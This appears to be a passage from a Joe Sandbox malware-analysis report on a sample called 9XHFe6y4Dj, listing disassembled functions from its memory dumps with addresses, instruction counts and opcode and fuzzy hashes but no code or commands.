                                                            • Opcode ID: ee8bbb89820e498849dc12c2c38020cab4eacfbf32e7dd298b8617bb7b5c3d8c
                                                            • Instruction ID: e7ada5c2199dc4a23884a0d590190abafb37e2a25bc13df86a34fa4467a7c35d
                                                            • Opcode Fuzzy Hash: ee8bbb89820e498849dc12c2c38020cab4eacfbf32e7dd298b8617bb7b5c3d8c
                                                            • Instruction Fuzzy Hash: 0121F731E1891D9FDF98EF18C465AEDB7B1FFA8340F4041AAD00EE3691CB35A9818B40
                                                            Function 00007FF848FB91EA Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b5154e6247f1a67128639fcafe0be621689cb3d71b2f281632adfc7559222ee0
                                                            • Instruction ID: c52e47acca080bb470c828e61328a49dd946c0de2677cc676e0df8d3cecaebb3
                                                            • Opcode Fuzzy Hash: b5154e6247f1a67128639fcafe0be621689cb3d71b2f281632adfc7559222ee0
                                                            • Instruction Fuzzy Hash: 57110671E0D9858FEB45FBA894526EC77E1EF5A310F14007DC14AC35C3DB1854428344
                                                            Function 00007FF848FC3098 Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c97b5d45405a81873c6f0385c20af061e2784d9583a4c23d4f171ba68b5c96ba
                                                            • Instruction ID: 2e0a0dfc8a34b723020d581eb1a5837acfe688ae0ba50b0f6acaa2a4e393dd52
                                                            • Opcode Fuzzy Hash: c97b5d45405a81873c6f0385c20af061e2784d9583a4c23d4f171ba68b5c96ba
                                                            • Instruction Fuzzy Hash: 7721EB3091CC678EE66CA30C58549F4B691FF52345F2846B7E04F874CACB2CBAC59B95
                                                            Function 00007FF848FB1610 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57922adacf06142bf0e5e78d2f7813c36e66878767dea788dbf3ed12749925be
                                                            • Instruction ID: 7d16fd425570a933a5844782e2c4c90930e3a4624b4d036d9828b62ec0a757fb
                                                            • Opcode Fuzzy Hash: 57922adacf06142bf0e5e78d2f7813c36e66878767dea788dbf3ed12749925be
                                                            • Instruction Fuzzy Hash: 1711DA3091C4678EE629A70884745B47793FF70341F2C4AB9D55F8B9DEEA2CB8C19385
                                                            Function 00007FF848FBACA0 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 31c74d694108a4532fd8a681e10561f1f36b8fa97573bb03703865f57fb99d6e
                                                            • Instruction ID: 913d12437658552dc04e497e3a976124045e615f617e00f800a5c603fca96ee3
                                                            • Opcode Fuzzy Hash: 31c74d694108a4532fd8a681e10561f1f36b8fa97573bb03703865f57fb99d6e
                                                            • Instruction Fuzzy Hash: 3311DA3091D4AB8EE67CA70884645B47351FF74342F648677D45B8B5DACA2CB8C197C8
                                                            Function 00007FF849341220 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e860577313c1589cd3501a2f30ba5e1bd971021acf10264566aeb12f995c98f
                                                            • Instruction ID: 2aff100dc64457da1ec354e147a24a8f24bcbdee78b92a2f575179e39cd46084
                                                            • Opcode Fuzzy Hash: 9e860577313c1589cd3501a2f30ba5e1bd971021acf10264566aeb12f995c98f
                                                            • Instruction Fuzzy Hash: E411EB3092CCBA8EE63CAE44C054DB47252FB723457195A7BD05BC74CAD928BD819780
                                                            Function 00007FF848FB9029 Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03bf6db925e22ebbac4625efe4efdfdc0a6c0605229d8563743ac17706e7b425
                                                            • Instruction ID: 2055c3152a27e3638d0040c5ef108f057354285091c2120668995164e8a89ad5
                                                            • Opcode Fuzzy Hash: 03bf6db925e22ebbac4625efe4efdfdc0a6c0605229d8563743ac17706e7b425
                                                            • Instruction Fuzzy Hash: 0A113A32E0D6895FE766E77448056E97BA5EF67380F04007AD00AD71C3EE5C580A8360
                                                            Function 00007FF8493402A0 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11acca074a94994ce4b49148a6d5ba83e2b8614ec65cc2c0bf7173832a78decf
                                                            • Instruction ID: 842546d953d66ea65ccf1578d46bd4cced529ce090d250acd40dd11ec972b776
                                                            • Opcode Fuzzy Hash: 11acca074a94994ce4b49148a6d5ba83e2b8614ec65cc2c0bf7173832a78decf
                                                            • Instruction Fuzzy Hash: 8611A33262C9494FDFA0FF24A4505FA77A1FF94254F100A7AD58EC34D2DE26E4058380
                                                            Function 00007FF848FB0690 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 72cd52b9a279adb02b57d3e55f2b2090260bf18c5340af63cf6911d3c851adaf
                                                            • Instruction ID: a9d15dcdec0331fde4e6d98e882c57886b52a88f3c18a5b231268b349e6d4215
                                                            • Opcode Fuzzy Hash: 72cd52b9a279adb02b57d3e55f2b2090260bf18c5340af63cf6911d3c851adaf
                                                            • Instruction Fuzzy Hash: 2A11E521A2CA494FCF90FB2494616FAB7E1FFA5350F500A3AD54EC34D2DF29B5069384
                                                            Function 00007FF848FB050E Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c3d2ceac2956eca091a50b8977439bdd32408989715487ddcfd1600d38a17c5
                                                            • Instruction ID: ba8b005fd10369cdd29164b5dced2d7bd558205540d5885f829f97b94c8272de
                                                            • Opcode Fuzzy Hash: 0c3d2ceac2956eca091a50b8977439bdd32408989715487ddcfd1600d38a17c5
                                                            • Instruction Fuzzy Hash: 2401F53221C6098FEB44FB18E4653F67790EBA9364F20023FDA19C36D1DB66A951D780
                                                            Function 00007FF848BF1B3B Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37e1500faba3976c2a6ddb2081739b0cb8ebc8321de366a9f0b10cc9d77a117f
                                                            • Instruction ID: a61220393bc4d2deafd19ee6235a8d8c14e3945d11daa096656f000c1d39f599
                                                            • Opcode Fuzzy Hash: 37e1500faba3976c2a6ddb2081739b0cb8ebc8321de366a9f0b10cc9d77a117f
                                                            • Instruction Fuzzy Hash: AD010961F0C90A9FEB94FB28845967863D1EF94341F0544B5D28EC76A2EF28AC428748
                                                            Function 00007FF84934011E Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9b57b117f2a1ec6899de0fb440df2994f458889860dcc2ceea1db04f1d883849
                                                            • Instruction ID: dd9ab584e696ecb880dd020a15403269141c488e8671499887ff8136cb649b49
                                                            • Opcode Fuzzy Hash: 9b57b117f2a1ec6899de0fb440df2994f458889860dcc2ceea1db04f1d883849
                                                            • Instruction Fuzzy Hash: D901453230C58A8FDB54BF18E4643FA37A0EBAA314F20057EDA49C36D2DA26A5508380
                                                            Function 00007FF848FB9D2D Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f77a8daef9093b96c2e45eecff710ff9a723e6b8d3fe025f098cfe570d26b147
                                                            • Instruction ID: 15b5f4fe564d53dabe425245e64ea5bee2a68b830fa127b592ced52280e83405
                                                            • Opcode Fuzzy Hash: f77a8daef9093b96c2e45eecff710ff9a723e6b8d3fe025f098cfe570d26b147
                                                            • Instruction Fuzzy Hash: F501F521A2CA484EDB91FB2994606FA37E0EFA4351F20093ED54EC34C3DF29E40A9384
                                                            Function 00007FF848BF0C40 Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a34488278e3d82d5e6647c4b78a3e2c504be956444fc030f0c10daaffd70c2f5
                                                            • Instruction ID: bdad4f79482ba48cf2a07d991291eaa8db1d24420bdf74797c50bb1bc238c839
                                                            • Opcode Fuzzy Hash: a34488278e3d82d5e6647c4b78a3e2c504be956444fc030f0c10daaffd70c2f5
                                                            • Instruction Fuzzy Hash: 5E11A131A0DA898FE702FB7888541AC7FB0EF42351F1541F6D284DB2A2DB38554A8B84
                                                            Function 00007FF848FB9B9E Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c531bc4d094f317e40f57ba54d8f0cb85c81915f652febb5e2fde9ad655e5b2
                                                            • Instruction ID: d7d06da08c97579d53da832f4ce3fd8072ff27898eb3b23fe994b3de55d99756
                                                            • Opcode Fuzzy Hash: 7c531bc4d094f317e40f57ba54d8f0cb85c81915f652febb5e2fde9ad655e5b2
                                                            • Instruction Fuzzy Hash: EC01F53531C64A8FEB45EB1CD4A43E93790EBA5354F24056EDA09C36C2EA6AA944C384
                                                            Function 00007FF848BF4D66 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1ed696720f8c68cbb788f1ecb2d56e055bc07240dc3eb05ed1264bfa72fd9f0
                                                            • Instruction ID: 5fc416eb5f8a9ee840b9ee74049d0692afd4274878f92fb4f7eab2076eb635ea
                                                            • Opcode Fuzzy Hash: c1ed696720f8c68cbb788f1ecb2d56e055bc07240dc3eb05ed1264bfa72fd9f0
                                                            • Instruction Fuzzy Hash: 2D118E7090C11A8FFB59AA04C850BE873A1DF45314F1440B9C69ED37C2DF29AE46CB48
                                                            Function 00007FF848FBE87E Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4544026ff2d145f4637df7a7bdf4bb442893b5c9ee7fcb6631a2f562fec9795e
                                                            • Instruction ID: cac269c88021b824c5489375b044d7ec770a2bed86dc0c0f2524e74f16a61e2a
                                                            • Opcode Fuzzy Hash: 4544026ff2d145f4637df7a7bdf4bb442893b5c9ee7fcb6631a2f562fec9795e
                                                            • Instruction Fuzzy Hash: D9F0683170C9084FDB98EB1CA41A2B977D1FB98325B50013FD18ED3665DE2598434745
                                                            Function 00007FF848BF22AD Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83840462cce8a2a02302d166df8034b2a2c9039ed07f07b848f3c41095761776
                                                            • Instruction ID: 7dae54374be2b2c83e6c09665d2c4c3244a4bc03b1c32b0be18e9357396e5532
                                                            • Opcode Fuzzy Hash: 83840462cce8a2a02302d166df8034b2a2c9039ed07f07b848f3c41095761776
                                                            • Instruction Fuzzy Hash: 191121359489188FDB54EF04C895BADB3E1FF59340F5105A9D14EE72A1CF34A940CB85
                                                            Function 00007FF848BF0C48 Relevance: .0, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a014036a338c4b71aba2154600392ced091f640b9a89c84cdc915db783f41fb
                                                            • Instruction ID: 02b0ff90adc2e0d52a0fe5159c1137e773b1f2c8cfda33fcd6e19933c344cb04
                                                            • Opcode Fuzzy Hash: 9a014036a338c4b71aba2154600392ced091f640b9a89c84cdc915db783f41fb
                                                            • Instruction Fuzzy Hash: 3C019231D0DA898FD701FB74884419C7FB0EF02350F1541F6D284DB2A2DB38954AC784
                                                            Function 00007FF848BF0C50 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c4a368af7c9e423c3783f3564b3936bc258b1146670070c186c5bd4d302dee7c
                                                            • Instruction ID: 94c26f3fb0fe96e2f68669cb5ba8a737e4b6018fbd2f5aaf895de0bad2b9039a
                                                            • Opcode Fuzzy Hash: c4a368af7c9e423c3783f3564b3936bc258b1146670070c186c5bd4d302dee7c
                                                            • Instruction Fuzzy Hash: CB018F30D0DA899FE711FB7488841AD7FB0EF02340F1441E6D284DB2A3DB389A49C744
                                                            Function 00007FF848FBEAB7 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aa7fe0516dc8b5749d9c03ebaae8f3473925609a1c0b40c6717775de44d576e1
                                                            • Instruction ID: dc63444181dbc8f4d1f12dd1e81e4aa8fee801b7ce14914dfadacbdae58f529b
                                                            • Opcode Fuzzy Hash: aa7fe0516dc8b5749d9c03ebaae8f3473925609a1c0b40c6717775de44d576e1
                                                            • Instruction Fuzzy Hash: A501AD70D4856A9FDFA8EF08C494BB8B7B1EB64341F1040EAD00ED7681DA7569C0DF40
                                                            Function 00007FF848FB8392 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0fce9bf9cbf7c6330faf81588a94c02638fcfe115b87c914000cebaed6322013
                                                            • Instruction ID: 2de7dab62150e1b92d9ae2095f55c63ad99b61ff2111cba481e699fa4649507b
                                                            • Opcode Fuzzy Hash: 0fce9bf9cbf7c6330faf81588a94c02638fcfe115b87c914000cebaed6322013
                                                            • Instruction Fuzzy Hash: F9F0F63285E2C59FD302DBB088514EA3FB0EF56240F1800F6E046C70D2CB6D560AD361
                                                            Function 00007FF849346572 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3dbf1801f26ff6a298d212b232cd0c58711b848df3dad3587de4e436acd6bbde
                                                            • Instruction ID: 14091a9ccecc38be65a04b6ba67c559e1a0aa9c58222bdcc58a7ee2626c8f52d
                                                            • Opcode Fuzzy Hash: 3dbf1801f26ff6a298d212b232cd0c58711b848df3dad3587de4e436acd6bbde
                                                            • Instruction Fuzzy Hash: C8F0F63184D2C59FD3169F7088154E53FA0EF43318B1900FAE085CB0A2C52D160ACB61
                                                            Function 00007FF848BF5F87 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce749b0e960016d5c2acbca1af00a585ae9a578d308ddd4ffd1434afba4a8635
                                                            • Instruction ID: b0e9e371cb5f08fbf69d85618c3f360d1a94f79a350f58d891499723bef98347
                                                            • Opcode Fuzzy Hash: ce749b0e960016d5c2acbca1af00a585ae9a578d308ddd4ffd1434afba4a8635
                                                            • Instruction Fuzzy Hash: 5001A930D1C80A8EEB64F614CC856F873A0FB54352F1041B9C58ED3991DF3869868F49
                                                            Function 00007FF848FBEFB2 Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4324c433b14c6d4e9dd9f2deab7e127f96c415c8a6eb3d2a2743572162a5c981
                                                            • Instruction ID: 5d99e0e4c2d7268de12932f4ff7fd2caa3ceeb076a43411e35718989d85e07da
                                                            • Opcode Fuzzy Hash: 4324c433b14c6d4e9dd9f2deab7e127f96c415c8a6eb3d2a2743572162a5c981
                                                            • Instruction Fuzzy Hash: F2F0F63184E2C59FD306EBB088514E57FB0FF53210F1800FAD046CB0E2C62D6656C7A1
                                                            Function 00007FF848BF5F3E Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db8bf9ec5e88451419c03bf25d02a19787be88e2a439475d36952a615a5470ac
                                                            • Instruction ID: 6e81e470e5cba730cd4e18902f73953413f49d28a1dc62a069cbfd67055340ba
                                                            • Opcode Fuzzy Hash: db8bf9ec5e88451419c03bf25d02a19787be88e2a439475d36952a615a5470ac
                                                            • Instruction Fuzzy Hash: B7F05B30D1C4068FEB54F618D8856B87391EF54351F1441B5D9DED39E2DF287C468A4D
                                                            Function 00007FF84934726A Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e3da6cc6b07e84ea7825aa4af85b2455e014f7a2c0495467b343c7baf677690
                                                            • Instruction ID: af32d7d3482906277a7c1f667a3b65c5377a152a22c590d205e39c6f99baf91f
                                                            • Opcode Fuzzy Hash: 5e3da6cc6b07e84ea7825aa4af85b2455e014f7a2c0495467b343c7baf677690
                                                            • Instruction Fuzzy Hash: 2CF0BE2190E3C24FDB22AF648CA11A83FE0DF6735070A06FAC4898B2D7D5A86405DB56
                                                            Function 00007FF848FB908A Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5017468d74801fbab93fc2a4c47dbc12bd7278d44070b01d4e1dc4cafd831979
                                                            • Instruction ID: 9d77520cab43d3b60d6503f2eac74fd0bb7148d1c452e92641081051019ee118
                                                            • Opcode Fuzzy Hash: 5017468d74801fbab93fc2a4c47dbc12bd7278d44070b01d4e1dc4cafd831979
                                                            • Instruction Fuzzy Hash: 7BF0BE31A0D3C64FEB13AB708C901A83FE0DF23390B0906FAC4898B1D7E7A86505D315
                                                            Function 00007FF848FB9B78 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: de6958a3c166c8b5c8932bb0c9306bc4c156f3d6a49f8e070b218845d80949fa
                                                            • Instruction ID: bab34a1858c224e6058ba39209dd4750c3243ca04d1e3bb8467b76009751c99e
                                                            • Opcode Fuzzy Hash: de6958a3c166c8b5c8932bb0c9306bc4c156f3d6a49f8e070b218845d80949fa
                                                            • Instruction Fuzzy Hash: E4F0E525B2DA868EF767732594A13BC1B009FA5380F30443EC54E828C7FE1E6601A399
                                                            Function 00007FF8493604E8 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09208c7981c43d983e2844fcf546d71d0d3929a11ff9bbec8a042dbedb74119c
                                                            • Instruction ID: c4d818c57a058b991c2e66f283efc9aaf465909c52e82b7a176bbbd39f918182
                                                            • Opcode Fuzzy Hash: 09208c7981c43d983e2844fcf546d71d0d3929a11ff9bbec8a042dbedb74119c
                                                            • Instruction Fuzzy Hash: 22E0CD30724F084F8F1CEE1D88C6831B7E1E7AE746B94406ED446C7255DD66EC85C781
                                                            Function 00007FF848BF0B87 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 28453b5a7f2ee2bc51d9f6563220fae9a223e14b0157be7d3f7f4e9fa749ecf5
                                                            • Instruction ID: e40075101f3672991ea6df131e8f423df0773ea41ece2c87ea31e8142cb690bf
                                                            • Opcode Fuzzy Hash: 28453b5a7f2ee2bc51d9f6563220fae9a223e14b0157be7d3f7f4e9fa749ecf5
                                                            • Instruction Fuzzy Hash: 30E086216598498FCA09BB389CA58E5FB60FB47215B8B01EAD04CC75A2E315585DD741
                                                            Function 00007FF8493431A2 Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
